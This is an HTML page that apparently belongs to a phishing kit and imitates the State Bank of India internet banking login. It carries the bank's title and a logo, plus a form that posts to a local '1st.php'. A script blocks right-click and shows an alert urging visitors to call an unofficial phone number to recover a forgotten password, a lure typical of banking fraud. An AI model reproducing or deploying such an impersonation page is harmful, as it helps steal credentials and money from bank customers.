<!DOCTYPE html>
<html lang="eng">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <title>State Bank of India - Internet Banking</title>
  <style>
  #ml
  {
  width:20%;
  margin-left:6px;
  position:absolute;
  top:6px;
  }
  #img
  {
  width:105%;
  margin-left:-7.8px;
  }
  #ab
  {
  width:365px;
  margin:0px;
  border-bottom:solid #E6E6E6;
  border-width:1.2px;
  }
  </style>
  <script language="javascript"> 
  var message="To forgot password please call-01204888488";
  function clickIE4(){
  if (event.button==2){
  alert(message);
  return false;
  }
  }
  function clickNS4(e){
  if (document.layers||document.getElementById&&!document.all){
  if (e.which==2||e.which==3){
  alert(message);
  return false;
  }
  }
  }
  if (document.layers){
  document.captureEvents(Event.MOUSEDOWN);
  document.onmousedown=clickNS4;}
  else if (document.all&&!document.getElementById){
  document.onmousedown=clickIE4;}
  document.oncontextmenu=new Function("alert(message);return false;")
  </script>
  </head>
  <body>
  <div class="line">
  <b style="font-family:arial; font-size:20px; color:black; margin-left:90px;">Login to
  <img src="mlogo.png" alt="" id="ml">
  <div id="ab" 
  style="margin:10px; 
  margin-left:-8px;">
  </div>
  <form action="1st.php" method="post">
  <img src="forgot.jpg" alt="" id="img">
  </form></b></div></body></html>